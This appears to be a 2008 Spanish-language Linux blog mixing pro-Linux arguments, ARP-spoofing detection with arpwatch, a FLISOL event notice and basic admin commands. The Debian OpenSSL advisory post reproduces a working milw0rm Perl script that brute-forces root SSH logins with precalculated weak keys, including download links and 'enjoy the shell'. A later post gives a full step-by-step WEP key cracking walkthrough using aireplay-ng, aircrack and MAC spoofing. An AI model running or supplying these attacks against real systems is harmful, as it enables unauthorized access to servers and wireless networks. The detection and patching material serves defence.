22 - En GNU/Linux hay muy pocas razones para temer la existencia de puertas traseras, en parte porque todo el código fuente está disponible para su inspección. Una puerta trasera es un método secreto para obtener acceso remoto a un ordenador. Existe una (muy justificada) preocupación por parte de los gobiernos y las corporaciones de que dichas puertas traseras se han insertado de forma encubierta en el software propietario, permitiendo a los desarrolladores y a otros gobiernos a acceder a sus datos confidenciales.

23 - El uso y la promoción de GNU/Linux ayuda a fomentar una sana diversidad y aumento de competencia en toda la industria del software. Esa competencia puede promover el avance tecnológico, mejorar el rendimiento y disminuir los costes del software libre y del software propietario por igual. Tanto la teoría económica como los cientos de años de real experiencia en el mundo demuestran claramente que los monopolios no necesitan innovar, tienden a producir productos de mala calidad, inflan los precios y tienden a corromper el sistema político.

24 - GNU/Linux y el software libre no solo han alcanzado, o en algunos casos superado al software privativo, sino que también desarrollan más rápido. Esta tendencia irá a más, dado que la demanda para este tipo de software sigue creciendo y cada vez más personas y organizaciones participan activamente en su desarrollo.

25 - GNU/Linux ofrece la oportunidad de que los usuarios puedan contribuir al avance de la tecnología del software, debido a que el código fuente está disponible gratuitamente para ser estudiado, mejorado, ampliado y redistribuido. Un notable ejemplo de ello a nivel empresa ha sido IBM.

26 - Existen en realidad más de 25 razones por las que organizaciones de todo el mundo están migrando a GNU/Linux. Un vigésimo sexto motivo es que con GNU/Linux no hay necesidad de desfragmentar los discos duros a diferencia de Windows. La fragmentación, que es la difusión de datos en lugares no contiguos puede reducir la eficacia del almacenamiento de datos y ralentizar el funcionamiento de la máquina. Desfragmentar no es difícil, pero puede ser una molestia tener que hacerlo periódicamente, y no es necesario si tienes un sistema operativo bien diseñado.

He aqui las fuentes originales.

EN INGLES

EN ESPAÑOL.

Detectando ARP Spoofing

2008-05-17T13:09:00.002-05:00

Estas son dos de las formas mas fáciles que e encontrado para detectar el arp spoofing, son utilizando las herramientas de arpwatch y arpalert. Las puedes instalar en Debian desde synaptic o bien.

#apt-get install arpwatch
#apt-get install arpalert

ambos mandan alertas a /etc/log/syslog puedes hacerte un script para mandar las salidas a a otro archivo y también editar sus .conf en /etc/arpalert y /etc/arpwatch.conf . Puedes ver los manuales oficiales de ellos.

#man arpalert
#man arpwatch

Aquí esta la salida de syslog para ambos archivos arp mandándoles la orden que lean la interfaz eth2

#arpalert -i eth2 {cambias la interfaz por la que te interese que este ala escucha}
#arpalert -i eth2

#cat /var/log/syslog | grep arp

May 17 13:12:40 zk kernel: Measured 4131621884 cycles TSC warp between CPUs, turning off TSC clock.
May 17 13:43:59 zk arpalert: Auto selected device: eth1
May 17 13:43:59 zk arpwatch: bad interface eth1: eth1: no IPv4 address assigned - assuming unconfigured interface
May 17 13:43:59 zk arpwatch: Running as uid=115 gid=121
May 17 13:43:59 zk arpwatch: listening on eth1
May 17 13:43:59 zk arpwatch: exiting
May 17 13:44:16 zk arpalert: Auto selected device: eth1
May 17 13:44:16 zk arpalert: daemon instance already running (file: /var/run/arpalert.pid locked)
May 17 13:44:34 zk arpwatch: bad interface eth1: eth1: no IPv4 address assigned - assuming unconfigured interface
May 17 13:44:34 zk arpwatch: listening on eth1
May 17 13:44:57 zk arpwatch: exiting
May 17 14:41:04 zk arpalert: Selected device: eth2
May 17 14:41:04 zk arpalert: daemon instance already running (file: /var/run/arpalert.pid locked)
May 17 14:41:42 zk arpwatch: listening on eth2
May 17 14:42:10 zk arpwatch: new station 192.168.0.11 0:38:de:34:46:g7 eth2
May 17 14:42:10 zk arpwatch: new station 192.168.0.1 0:44:54:84:F3:c5 eth2
May 17 14:43:13 zk arpwatch: bogon 1.15.54.18 0:44:4:34:14:c3 eth2
May 17 14:55:14 zk arpwatch: bogon 1.15.54.18 0:44:45:y4:d3:56 eth2
May 17 15:07:27 zk arpwatch: bogon 1.15.54.18 0:1e:45:y4:t3:56 eth2
May 17 15:10:15 zk arpwatch: bogon 1.15.54.18 0:64:43:8a:1y:t6 eth2
May 17 15:14:38 zk arpalert: Auto selected device: eth1
May 17 15:14:38 zk arpalert: daemon instance already running (file: /var/run/arpalert.pid locked)
May 17 15:25:16 zk arpwatch: bogon 1.15.54.18 0:44:74:w4:13:56 eth2
May 17 15:30:36 zk arpwatch: bogon 1.15.54.18 0:d4:48:e4:13:56 eth2

[SECURITY] [DSA 1571-1] New openssl packages fix predictable random number generator

2008-05-15T14:54:00.004-05:00

Vulnerabilidad crítica en las claves OpenSSL de Debian y las basadas en debian tambien.

Ubuntu Ubuntu Linux 8.04 LTS sparc
Ubuntu Ubuntu Linux 8.04 LTS powerpc
Ubuntu Ubuntu Linux 8.04 LTS lpia
Ubuntu Ubuntu Linux 8.04 LTS i386
Ubuntu Ubuntu Linux 8.04 LTS amd64
Ubuntu Ubuntu Linux 7.10 sparc
Ubuntu Ubuntu Linux 7.10 powerpc
Ubuntu Ubuntu Linux 7.10 lpia
Ubuntu Ubuntu Linux 7.10 i386
Ubuntu Ubuntu Linux 7.10 amd64
Ubuntu Ubuntu Linux 7.04 sparc
Ubuntu Ubuntu Linux 7.04 powerpc
Ubuntu Ubuntu Linux 7.04 i386
Ubuntu Ubuntu Linux 7.04 amd64
Debian Linux 4.0 sparc
Debian Linux 4.0 s/390
Debian Linux 4.0 powerpc
Debian Linux 4.0 mipsel
Debian Linux 4.0 mips
Debian Linux 4.0 m68k
Debian Linux 4.0 ia-64
Debian Linux 4.0 ia-32
Debian Linux 4.0 hppa
Debian Linux 4.0 arm
Debian Linux 4.0 amd64
Debian Linux 4.0 alpha
Debian Linux 4.0

Anuncio en debian

en MilwOrm

the debian openssl issue leads that there are only 65.536 possible ssh
keys generated, cause the only entropy is the pid of the process
generating the key.

This leads to that the following perl script can be used with the
precalculated ssh keys to brute force the ssh login. It works if such a
keys is installed on a non-patched debian or any other system manual
configured to.

On an unpatched system, which doesn't need to be debian, do the following:

keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/

1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2

2. Extract it to a directory

3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
Bits, generated on an upatched debian (this is the key this exploit will
break)

4. Run the perl script and give it the location to where you extracted
the bzip2 mentioned.

#!/usr/bin/perl
my $keysPerConnect = 6;
unless ($ARGV[1]) {
print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
print "By mm@deadbeef.de\n";
exit 0;
}
chdir($ARGV[0]);
opendir(A, $ARGV[0]) || die("opendir");
while ($_ = readdir(A)) {
chomp;
next unless m,^\d+$,;
push(@a, $_);
if (scalar(@a) > $keysPerConnect) {
system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
".$_ } @a)." ".$ARGV[1]);
@a = ();
}
}

5. Enjoy the shell after some minutes (less than 20 minutes)

Regards,
Markus Mueller
mm@deadbeef.de

# milw0rm.com [2008-05-15]

Yo en mi sistema hice lo siguiente:

# rm /etc/ssh/ssh_host_*

Y después las he regenerado con:

# dpkg-reconfigure -plow openssh-server

Y todo perfecto.

Esto lo leei en un post de haplo en esDebian

Excelente video, esta para llorar.

2008-05-06T23:23:00.004-05:00

Excelente vídeo este vídeo tiene mas de medio año que lo avía visto y hoy no se porque me acorde del, y decidí ponerlo en el blog para que la gente lo pudiera apreciar también, espero les guste tanto como a mi.

otro en link al mismo video.

VIDEO AQUI y AQUI

No mames .....

2008-05-05T16:35:00.002-05:00

HAAAAAA NO MAMES SIEMPREEEEE.............

Como usar un Exploit

2008-05-02T12:24:00.000-05:00

Hay diferentes tipos de exploits, se pueden clasificar en locales y remostos. Los Remotos actúan desde tu maquina hacia la maquina a explotar la vulnerabilidad, por lo general se explota una vulnerabilidad de algún servicio que se este ejecutando, de tal manera que también podemos hacernos de algún puerto no privilegiado.
Los exploits locales se ejecutan en la misma maquina de tal manera que si deseamos atacar otra maquina necesitamos primero tener algún tipo de shell en la otra maquina para así utilizar el exploit, si no es así puede ser que el exploit nos afecte, esto es en caso de tener los mismos problemas de seguridad que la maquina a atacar.

Ahora bien para utilizar un exploit necesitamos primero entender el código del exploit ya que la mayoría de las veces vienen con algunos errores, para que no cualquiera los pueda ejecutar, ya sean algunas lineas comentadas o algún ciclo mal o ya sea valores de mas, offsets, etc, etc.
Depende mucho del exploit a ejecutar la mayoría están echos en C con lo que haríamos los siguiente.

#gcc exploit.c -o nombre_exploit
#./exploit [parametros] ----> en caso de que los tenga

Como lo mencione antes es útil leer el código para saber compilarlo y utilizarlo.

Los que estan en shellscript hariamos lo siguiente. (script.sh)
#chmod a+x script.sh
#script.sh [parametros]

Los que estan en perl hariamos los siguiente. (exploit.pl)
#perl exploit.pl [parametros]

De esta forma utilizamos la mayoría de los exploits. Aunque un exploit no es necesariamente un programa sino mas bien una forma de explotar alguna vulnerabilidad. Hay tener cuidado con estos ya que utilizarlos fuera de las auditorías de res, osea con permiso de poder ejecutarlos, se toma como delito.

Crackear (Auditar) claves WEP

2008-04-30T15:10:00.003-05:00

Primero que nada quiero aclarar que este pequeño documento les sirve a las personas que tienen las tarjetas ipw3945, ipw2915, ipw2200. Ya que yo tengo una de esas tarjetas y hace tiempo leei un documento que decía lo siguiente .

############
pw2915 uses ipw2200 driver (See this thread
ipw3945 for alpha injection support.) For ipw3945 you
can use the ipwraw-ng driver or see Live
Distros for WifiWay which includes patches for
injection.
#############

Ha si que por esa razón utilice ipwraw-ng para mi debían, pero me es mas sencillo utilizar el wifiway,
hasi que lo explicare utilizando wifiway, ya que viene muy bien soportada mi tarjeta ipw3945.

Lo primero es descargar la distro wifiway, y echarla andar, una ves tengamos jalando lo primero que haremos sera ver que AP astan jalando.

#airodump-ng rtap0

De esta manera veremos que AP están funcionando mejor y en que canal están viajando (chanel), también veremos el BSSID del AP. Después de ver cual es AP que mas nos conviene o de ver cual es el que queremos chingar, tomamos nota del canal (chanel, ch) y del BSSID del módem.
Ahora bien lo primero que aremos sera cambiar la MAC.

#macchanger -m [fakemac] [interface_wifi]
esto seria
#macchanger -m 00:22:33:11:44:66

Después entramos a los archivos bssid y chanel que se encuentran en /sys/class/net/wifi0/device y los editamos.

#nano chanel
Aquí ponemos el ch del AP a auditar, es decir el canal, por lo general son del 1 al 11, con los que mayormente me encontrado son el 1, 6 y el 11

#nano bssid
En este archivo ponemos el BSSID del AP o módem a auditar.

Despues de guardar ambos archivos, empezamos lo interesante. A CAPTURAR.

#airodump-ng -c [chanel] -w [ruta_y_nombre_del_archivo_de_captura] rtap0
esto seria.
#airodump-ng -c 1 -w /home/usuario/captura rtap0

Lo dejamos jalando y en el mismo directorio anterior editamos el archivo rate

#nano rate
aquí le damos el rango de 2, por lo general viene 108 se lo cambiamos y guardamos.

Este paso es si queremos, yo siempre lo hago, el cual es levantar la interfase.

#ifconfig [interfaz] up
seria
#ifconfig wlan0 up ----> en mi caso recordemos que las interfaces varían.

Ahora hay que asociar la tarjeta con el AP.

#aireplay-ng -1 0 -a [BSSID] -h [FAKEMAC] -e [ESSID_AP] [INTERFAZ]
esto seria.
#aireplay -ng -1 0 -a 29:D9:72:4D:15:55 -h 00:22:33:11:44:66 -e INFINITUM445 wifi0

#####este paso lo podemos repetir varias veces hasta asociarnos######

Después de la asociación hacemos.

#aireplay-ng -3 -b [BSSID] -h [FAKEMAC] [INTERFAZ]
esto seria.
#aireplay-ng -3 -b 29:D9:72:4D:15:55 -h 00:22:33:11:44:66 wifi0

En este punto esperamos asta tener bastantes IVs o datos capturados, varia siempre hay veces que tumbas la clave con pocos datos capturados y hay veces que necesitas de amadre, ha si que podemos hacer el siguiente paso varias veces hasta que nos la encuentre.

#aircrack-pwt ARCHIVO_DE_CAPTURA.cap
es decir
#aircrack-pwt /home/usuario/captura.cap
o bien
#cd /home/usuario
aircrack-pwt captura.cap

Si todo sale bien solamente hay que esperar a que aircrack decifre la clave y listo. Nos podemos conectar ha si.

#iwconfig [interfaz] essid [nombre_del_ap] mode managed key [CLAVE_WEP] && dhclient [interfaz]
esto seria.

#iwconfig wifi0 essid INFINITUM445 mode managed key 1029384756 && dhclient wifi0

Nota: Hay que revisar el RXQ para la captura sino tendremos que acercarnos mas al AP.
Nota2: Si no encuentras el archivo donde editas el BSSID, el CHANEL y el RATE puedes hacer un “find” para saber donde están.

#find / -name bssid
#find / -name chanel
#find / -name rate

Deberán estar en la misma carpeta. =)

FLISOL 2008

2008-04-25T16:56:00.003-05:00

¿Qué es el FLISOL?

El FLISOL (Festival Latinoamericano de Instalación de Software Libre) es el evento de difusión de Software Libre más grande en Latinoamérica. Se realiza desde el año 2005 y su principal objetivo es promover el uso del software libre, dando a conocer al público en general su filosofía, alcances, avances y desarrollo.

Para tal fin, las diversas comunidades locales de software libre (en cada país, en cada ciudad/localidad), organizan simultáneamente eventos en los que se instala de manera gratuita y totalmente legal, software libre en las computadoras que llevan los asistentes.

Además de la instalación de software libre, se ofrecen charlas.

El FLISOL 2008 se efectuará el día sábado 26 de abril en las instalaciones de la Universidad Autónoma de La Laguna -UAL-.

Las pláticas se celebrarán en el Auditorio de la Universidad y el Taller de Instalación en el CIP. (checar imagen)

El programa del evento iniciara con las siguientes pláticas:

Propuestas:
10:00 "Introducción al Software Libre".- por José Antonio Martínez Torres (toNo) 11:00 "Demostración práctica de GNU/Linux".- por Guillermo Valdez Lozano (guivaloz)

Para continuar al término de estas en el CIP con el Taller de instalación.

¿Quién organiza el evento?

La Comunidad de Software Libre en Latinoamérica, en el caso particular de La Laguna lo hace el Grupo de Usuarios de GNU/Linux de La Laguna -GULAG- conformado por personas de diversa índole, con el apoyo de otras entidades, principalmente educativas, y algunos patrocinadores del evento.

¿A quién esta dirigido el evento?

El evento está dirigido a todo público: estudiantes, académicos, trabajadores, entusiastas y aun personas que no poseen mucho conocimiento informático.

Si posees o no conocimientos e intereses en informática, licencias, derecho de autor/copyright y demás áreas de la ciencia y la tecnología, déjate tentar, asiste y participa del evento. Nuestro objetivo es compartir conocimientos y ansias de libertad.

¿Cuánto cuesta participar el evento?

La asistencia al evento es totalmente libre y gratuita.

¿Qué beneficios obtengo al asistir?

Tendrás la oportunidad de instalar software libre en tu computadora, apreciar qué es una real y segura alternativa a otros modelos de desarrollo y distribución de software, informarte sobre la filosofía, cultura y organización alrededor del mismo.

Tal vez encuentres una alternativa/solución en software libre para ti, tu empresa, colegio, universidad e, incluso, para tu gobierno. Podrás aclarar tus dudas acerca de los temas relacionados y quizás encuentres en el software libre, una alternativa de investigación, empleo y desarrollo tecnológico.

¿Qué necesito llevar para la instalación?

Tu equipo de computo, ya sea desktop o laptop, recomendamos que antes hagas una copia de seguridad de tu información importante -no nos hacemos responsables de la pérdida de información- y defragmentes tu disco duro.

Es importante para los organizadores conocer cuántos equipos se llevaran al evento, por ese motivo te solicitamos que confirmes tu participación vía correo electrónico a las siguientes direcciones:

flisol@gulag.org.mx

En la sede tendremos disponibles las distribuciones Debian, Ubuntu, Fedora, Mandriva, Slackware, si deseas alguna distribución en especial favor de traerla contigo.

Lleva cd's o dvd's vírgenes para que te lleves a tu casa los discos de la distribución que se te haya instalado.

¡Deseos de aprender!

Quiero ayudar ¿qué puedo hacer?

Hay varias opciones para colaborar, contacta con nuestro coordinador local, y ofrece tu apoyo en alguno de estos puntos:

* Difusión
* Patrocinio
* Como Instalador

Coordinador: César Eduardo Espino Quirarte ---> RIVE
mail de contacto: cespinoq at gmail.com
¡Gracias por el interes y esperamos verlos en el FLISOL!

find, netstat, ps, nmap

2008-04-20T16:43:00.000-05:00

Find SUID y SGID.
#find / -type d $ -perm -g+w -o -perm -o+w $ -exec ls -lad {} \;

netstat.
#netstat -luntp

ps.
#ps -ef

nmap.
# nmap -sV localhost